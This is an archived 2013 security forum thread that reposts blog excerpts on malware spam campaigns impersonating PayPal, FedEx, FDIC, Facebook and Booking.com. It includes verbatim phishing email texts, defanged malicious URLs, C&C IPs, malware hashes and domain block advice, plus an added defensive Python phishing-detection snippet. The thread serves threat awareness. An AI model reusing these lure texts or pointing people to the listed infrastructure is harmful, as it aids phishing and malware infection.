ZBot is a banker Trojan that steals e-banking information and logs keystrokes, but also has some limited backdoor and proxy features that allow its masters to take control of the machine. Crooks seem to find the BBB scam highly rewarding, as they have refreshed it several times a year since it was first spotted in 2010. It was November 2012 when the Bitdefender anti-spam lab signaled another huge wave of BBB scam spreading Trojan.Generic.8271699, a downloader awfully similar to the infamous BlackHole exploit pack... Organizations such as the Better Business Bureau NEVER send complaints via e-mail with attachments and links, exactly to avoid frauds. EXE files are a big no-no in e-mail messages. In fact, they are so dangerous that no company will e-mail you this kind of attachment. If your e-mail messages carry an exe file, just get rid of it..."
___

Super Bowl Scams ...
- https://www.bbb.org/...per-bowl-scams/
Jan 22, 2013 - "... be on the alert for knock-off team jerseys, counterfeit memorabilia and phony game tickets... Tickets for the big game can be an even bigger rip-off. There are thousands of Super Bowl tickets currently listed on Craig’s List, but the site offers no guarantees of any kind and does not require identification of its listers. Buying in person isn’t always an improvement, as it’s gotten easier and easier for scammers to make fake tickets that look real... In general, avoid scams by being -skeptical- of:
• Offers that sound “too good to be true”
• Pushy sales tactics
• Poor quality of merchandise
• Offers that require wire transfer of funds ..."
More: https://www.bbb.org/blog/
___

Phishing Scams use Facebook Info for Personalized SPAM
- https://www.bbb.org/...sonalized-spam/
Jan 25, 2013 - "... scammers are exploiting the fact that you’re more likely to click on a link if it was sent by a friend. Scammers find your information through Facebook or other social media accounts. Some set up fake accounts and send out friend requests. When you accept the request, they can view your friends and personal and contact information. Other scammers rely on social media users not locking down their privacy settings*, so basic information, such as your name, email address and friends’ names, is publicly available..."
* http://www.facebook....92235220834308/

:ph34r: :(

Edited by AplusWebMaster, 27 January 2013 - 10:51 AM.



#867 AplusWebMaster


Posted 28 January 2013 - 06:06 AM

FYI...

Bogus Paypal emails lead to BlackHole Exploit Kit
- http://blog.webroot....le-exploit-kit/
Jan 28, 2013 - "... Over the past 24 hours, cybercriminals have launched yet another spam campaign, impersonating PayPal, in an attempt to trick its users into thinking that they’ve received a “Transaction Confirmation”, which in reality they never really made. Once users click on -any- of the links found in the malicious emails, they’re exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog....exploit_kit.png
... Malicious domain name reconnaissance:
duriginal .net – 222.238.109.66 – Email: blackchromedesign2 @ymail .com
Name server: NS1.HTTP-PAGE .NET – 31.170.106.17 – Email: ezvalue @yahoo .com
Name server: NS2.HTTP-PAGE .NET – 7.129.51.158 – Email: ezvalue @yahoo .com
The campaign shares the same infrastructure... three of these campaigns have been launched by the same malicious party.
Upon successful client-side exploitation, the campaign drops MD5: 423daf9994d552ca43f8958634ede6ee * ...Trojan-Spy.Win32.Zbot.ilmw..."
(More detail at the webroot URL above.)
* https://www.virustot...fe199/analysis/
File name: contacts.exe
Detection ratio: 25/46
Analysis date: 2013-01-28
___

Zbot sites to block - 28/1/13
- http://blog.dynamoo....lock-28113.html
28 Jan 2013 - "These domains and IPs are currently acting as C&C and distribution servers for Zbot. I would advise blocking these IPs and domains if you can. There are three parts to the list: IPs with hosting company names, plain IPs for copy-and-pasting and domains identified on these servers..."
(Long list at the dynamoo URL above.)
___

Fake Facebook SPAM / gonita .net
- http://blog.dynamoo....ebook-spam.html
28 Jan 2013 - "This fake Facebook spam leads to malware on gonita .net:
Date: Mon, 28 Jan 2013 17:30:50 +0100
From: "Facebook" [addlingabn2 @bmatter .com]
Subject: Most recent events on Facebook
facebook
Hi [redacted],
You have disabled your Facebook account. You can reveal your account whenever you wish by logging into Facebook with your old login email address and password. After that you will be able to enjoy the site in the same way as before.
Kind regards,
The Facebook Team
Log in to Facebook and start connecting
Sign in
Please use the link below to resume your account :
http ://www.facebook .com/resume/
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 419 P.O Box 10007 Palo Alto CA 94301


The malicious payload is at [donotclick]gonita .net/detects/sign_on_to_resume.php (report here) hosted on the well-known IP of 222.238.109.66 (Hanaro Telecom, Korea)... malicious domains are active on the same IP..."

:ph34r: <_<

Edited by AplusWebMaster, 28 January 2013 - 04:13 PM.



#868 AplusWebMaster

Posted 30 January 2013 - 08:11 AM

FYI...

Intelius SPAM (or is it a data breach?)
- http://blog.dynamoo....ata-breach.html
30 Jan 2013 - "This spam was sent to an email address only used to register for intelius.com. Either there has been a data breach at Intelius, or they have decided to go into the gambling business.
From: Grand Palace Slots [no-reply @tsm -forum .net]
Date: 30 January 2013 10:39
Subject: Try to play slots - 10$ free
Mailed-By: tsm-forum .net
Feel the unique excitement of playing at the world's premiere games!
Grand Palace gives you welcome package for slots up to 8,000$! What a fantastic offer, straight from the heart of World's gaming leader!
This is a great offer, especially when you see what else Grand Palace has to offer:
- US players welcome
- more than 100 fun games, realistic graphics
- the most secure and up-to-date software
- professional support staff to help you with whatever you might need, any time of the day or night!
And in the end we want to give you 10$ absolutelly free! (Use code CASH10)
Hurry up! Your free Grand Palace cash is waiting! Play Today!
http ://www .igrandpalacegold .com
Click here to opt out of this email:
http ://unsubscribe .igrandpalacegold .com


The originating IP is 176.200.202.100 (Telecom Italia, Italy), spamvertised site is www .igrandpalacegold .com on 91.217.52.125 (Fajncom SRO, Czech Republic)... I'm assuming that Intelius doesn't want to promote what would be illegal gambling for US citizens, which really leaves just one other option..."
___

Fake FedEx emails lead to BlackHole Exploit Kit
- http://blog.webroot....le-exploit-kit/
Jan 29, 2013 - "... Cybercriminals are currently mass mailing tens of thousands of emails impersonating the company, in an attempt to trick its customers into clicking on exploits and malware dropping links found in the legitimate-looking emails...
Sample screenshot of the spamvertised email:
> https://webrootblog....exploit_kit.png
... Malicious domain name reconnaissance:
vespaboise.net – 222.238.109.66 – Email: blackchromedesign2 @ymail .com
Name Server: NS1.HTTP-PAGE .NET
Name Server: NS2.HTTP-PAGE .NET
... Upon successful client-side exploitation, the FedEx themed campaign drops MD5: c2f72ff5b0cf4dec4ce33e4cc65796b1 * ...PWS:Win32/Zbot.gen!AM.
... It also attempts to connect to the following IPs:
..."
(More detail at the webroot URL above.)
* https://www.virustot...bd1df/analysis/
File name: calc.exe
Detection ratio: 24/46
Analysis date: 2013-01-30
___

Malicious Spam Emails Target Nightclub Disaster in Santa Maria
- http://www.symantec....ter-santa-maria
Jan 30, 2013 - "... spammers are distributing malicious emails that attempt to lure users into viewing a video of the incident that killed 233 people recently in a horrific tragedy at a popular nightclub in Santa Maria, Brazil. The malicious email is in Portuguese and invites unsuspecting users to click on a link to watch a video of the tragedy. The link provided in the email downloads a zip file containing a malicious control panel file as well as an executable file. Symantec detects this threat as Trojan Horse. Further analysis of the malicious file shows that the threat creates the following file:
%SystemDrive%\ProgramData\ift.txt
It also alters the registry entries for Internet Explorer. The threat then downloads an IE configuration file from a recently registered domain. Trojan Horse is usually a backdoor Trojan, downloader, or an infostealer. Samples of the spam emails are shown below (Figures 1 and 2). The email has the following characteristics:
Subject: Video mostra momento exato da tragedia em Santa Maria no Rio Grande Do Sul segunda-feira, 28 de janeiro de 2013
Subject: VIDEO DO ACIDENTE DA BOATE DE SANTA MARIA RS.
Translation: Video shows the beginning of the tragedy in Santa Maria, Rio Grande Do Sul Monday, January 28, 2013
Translation: Video of the Nightclub accident in Santa Maria RS
1) https://www.symantec...sterSpam1_0.png
2) https://www.symantec...sterSpam2_0.png
Users are advised to exercise caution when looking for videos, images, and news of recent popular events. Do not click on suspicious links or open attachments received in unsolicited emails. Keep your security software up-to-date in order to protect your information from online viruses and scams."
___

Fake FDIC SPAM / 1wstdfgh.organiccrap .com
- http://blog.dynamoo....niccrapcom.html
30 Jan 2013 - "Here's a slightly new spin on old spam, leading to malware on 1wstdfgh.organiccrap .com:
Date: Wed, 30 Jan 2013 16:16:32 +0200
From: "Тимур.Носков @fdic .gov" [midshipmanc631 @buprousa .com]
Subject: Important notice from FDIC
Attention!
Due to the adoption of a new security system, that is aimed at diminishing the number of cases of fraud and scams, all your ACH and WIRE transactions will be temporarily blocked until your security version meets the new requirements.. In order to restore your ability to make transactions, you are required to install a special security software. Please use the link below to download and install all the necessary files.
We apologize for causing you troubles by this measure.
If you need any assistance, please do not hesitate to contact us.
Sincerely yours,
Federal Deposit Insurance Corporation
Security Department


The link in the email goes through a legitimate hacked site (in this case [donotclick]www.edenespinosa .com/track .php?fdic) to the amusingly named [donotclick]1wstdfgh.organiccrap .com/closest/984y3fh8u3hfu3jcihei .php (report here*) hosted on 91.218.121.86 (CoolVDS / Kutcevol Maksum Mukolaevichm, US) which hosts the following suspect domains that you might want to block:
..."
* http://urlquery.net/...t.php?id=891059

:ph34r: <_<

Edited by AplusWebMaster, 30 January 2013 - 09:56 AM.



#869 AplusWebMaster

Posted 31 January 2013 - 07:54 AM

FYI...

Fake FDIC SPAM / 123435jynfbdf.myWWW .biz
- http://blog.dynamoo....dfmywwwbiz.html
31 Jan 2013 - "More FDIC themed spam, leading to a malicious payload on the same IP as this one:
From: ".Афанасьев @fdic .gov" [mailto:dickysmv341 @homesextapes .com]
Sent: 30 January 2013 15:03
Subject: Changing security requirements
Importance: High
Dear Sirs,
In connection with the introduction of a new security system for the purpose of preventing new cases of wire fraud, all your account ACH and WIRE transactions will be temporarily blocked unless the special security requirements are met.. In order to fully re-establish your account, you are asked to install a special security software. Please open the link below to download and install the latest security version.
We apologize for the inconveniences caused to you by this measure.
Please do not hesitate to contact us if you have any questions.
Yours faithfully,
Federal Deposit Insurance Corporation
Security Department


In this case the malicious payload is at [donotclick]123435jynfbdf.myWWW .biz./closest/984y3fh8u3hfu3jcihei.php and is hosted on 91.218.121.86 (CoolVDS / Kutcevol Maksum Mukolaevichm, US). At the moment the following domains seem to be active:
..."
___

Malicious ‘Facebook Account Cancellation Request’ themed emails serve client-side exploits and malware
- http://blog.webroot....ts-and-malware/
Jan 31, 2013 - "In December, 2012, we intercepted a professional-looking email that was impersonating Facebook Inc. in an attempt to trick its users into thinking that they’ve received an “Account Cancellation Request”. In reality, once users clicked on the links, their hosts were automatically exploited through outdated and already patched client-side vulnerabilities, which dropped malware on the affected PCs. Over the past 24 hours, cybercriminals have resumed spamvertising tens of thousands of legitimate-looking Facebook themed emails, once again using the same social engineering theme...
Sample screenshot of the spamvertised email:
> https://webrootblog....its_malware.png
... Sample client-side exploits served: CVE-2010-0188; CVE-2011-3544; CVE-2010-0840
... Malicious domain name reconnaissance:
kidstoytowers .com – 62.75.181.220 – responding to the same IP is also the following domain – dailyfrontiernews .com
Upon successful client-side exploitation, the campaign drops MD5: 9356fcd388b4bae53cad7aea4127d966 * ...W32/Injector.YMS!tr..."
(More detail at the webroot URL above.)
* https://www.virustot...c5cbd/analysis/
File name: test53356736863192.bin
Detection ratio: 3/46
Analysis date: 2013-01-28
___

Fake American Airlines email
- http://msmvps.com/bl...25/1823091.aspx
Jan 25 2013 - "This is -not- a real American Airlines / American Eagle email:
> http://msmvps.com/cf...00_380EFE9A.png
These types of spoof emails still work, fooling too many people. As always, if you hover your mouse cursor over the hyperlink it becomes easy to tell that the email is not legitimate.
> http://msmvps.com/cf...00_21200751.png
___

Dear Facebook, this change sucks
- http://msmvps.com/bl...03/1822008.aspx
Jan 3 2013 - "1. I don’t want to receive emails (aka most likely SPAM) from strangers.
> http://msmvps.com/cf...00_15139385.png
2. Your “control who can send you messages” link is broken.
> http://msmvps.com/cf...00_7E249C3B.png

> http://msmvps.com/cf...00_2B09D94A.png
Filed under: I ain't happy about this*...
* http://msmvps.com/bl...0_/default.aspx

:ph34r: <_< :ph34r:

Edited by AplusWebMaster, 31 January 2013 - 07:44 PM.

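Added example, not code from the forum post or the blogs it quotes: a Python check for the two tells visible in the FDIC and Facebook samples quoted above, a From: display name that mimics an address at a trusted domain while the real sender domain differs, and a link whose visible text and destination disagree (the hover-over check from the American Airlines item). The message and every domain in it are constructed placeholders.

```python
"""Added example (not from the post): flag a From: display name that looks like
an address at a trusted domain while the real sender differs, and a link whose
visible text names a different host than its href (the "hover" check)."""
import re
from email import message_from_string, policy
from html.parser import HTMLParser

ADDR_RE = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")  # address in a display name
HOST_RE = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", re.I)  # leading host

def host_of(s):
    """Lower-cased host named by a URL or bare host string, else None."""
    m = HOST_RE.match(s.strip())
    return m.group(1).lower().removeprefix("www.") if m else None

class _LinkCollector(HTMLParser):
    """Collects (href, visible text) for every <a> element."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def link_mismatches(html):
    """(shown_host, real_host) for links whose text names a host other than the
    href's; text with no hostname ("Sign in") cannot be checked this way."""
    p = _LinkCollector()
    p.feed(html)
    pairs = [(host_of(t), host_of(h or "")) for h, t in p.links]
    return [(s, r) for s, r in pairs if s and r and s != r]

def analyse(raw):
    """Findings as (kind, domain shown to the reader, real domain)."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    for a in msg["From"].addresses:
        m = ADDR_RE.search(a.display_name)
        if m and m.group(1).lower() != a.domain.lower():
            findings.append(("sender", m.group(1).lower(), a.domain.lower()))
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        findings += [("link", s, r) for s, r in link_mismatches(body.get_content())]
    return findings

# Constructed message modelled on the FDIC spam quoted above; domains are placeholders.
SAMPLE = """\
From: ".Afanasiev@fdic.gov" <dickysmv341@attacker-sender.invalid>
Content-Type: text/html; charset="us-ascii"

<p><a href="http://hacked-site.invalid/closest/x.php">https://www.fdic.gov/security/update</a></p>
<p><a href="http://hacked-site.invalid/unsub.php">Click here to opt out</a></p>
"""
```

A bare brand name as display name (the "Facebook" sample) needs a brand list rather than the address-token check; the link check still catches its mismatched "facebook.com" link text.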


#870 AplusWebMaster

Posted 01 February 2013 - 05:06 AM

FYI...

Fake Booking .com ‘Credit Card was not Accepted’ emails lead to malware
- http://blog.webroot....ead-to-malware/
Feb 1, 2013 - "Cybercriminals are mass mailing tens of thousands of emails, impersonating Booking .com, in an attempt to trick its users into thinking that their credit card was not accepted. Users are then urged to click on a fake “Print Booking Details” link, which leads them to the malware used in the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog....pam_malware.png
... Sample detection rate for the malicious executable: MD5: 75db84cfb0e1932282433cdb113fb689 * ... TrojanDownloader:Win32/Kuluoz.B...
Once executed, the sample phones back to the following command and control (C&C) servers:
...
More malware variants are known to have phoned back to the same IPs..."
(More detail at the webroot URL above.)
* https://www.virustot...sis/1359641226/
File name: BookingInfo.exe
Detection ratio: 26/46
Analysis date: 2013-01-31
___

Fake Photo SPAM / eghirhiam .ru
- http://blog.dynamoo....ghirhiamru.html
1 Feb 2013 - "Here's a tersely-worded Photos spam leading to malware on eghirhiam .ru:
Subject: Photos

Good day,
your photos here http: //www.jonko .com/photos.htm


As is usually the case, the malware -bounces- through a legitimate hacked site and in this case ends up at [donotclick]eghirhiam .ru:8080/forum/links/public_version.php (report here) hosted on:
82.148.98.36 (Qatar Telecom, Qatar)
195.210.47.208 (PS Internet Company Ltd, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)
The following IPs and domains are all related and should be blocked:
..."
___

Something evil on 50.116.40.194
- http://blog.dynamoo....5011640194.html
1 Feb 2013 - "50.116.40.194 (Linode, US) is hosting the Blackhole Exploit Kit (e.g. [donotclick]14.goodstudentloans .org/read/walls_levels.php - report here*) and seems to have been active in the past 24 hours. I can see two domains at present, although there are probably many more ready to go:
14.goodstudentloans .org
14.mattresstoppersreviews .net"
* http://urlquery.net/...t.php?id=903191

:ph34r: <_< :ph34r:

Edited by AplusWebMaster, 01 February 2013 - 10:46 AM.

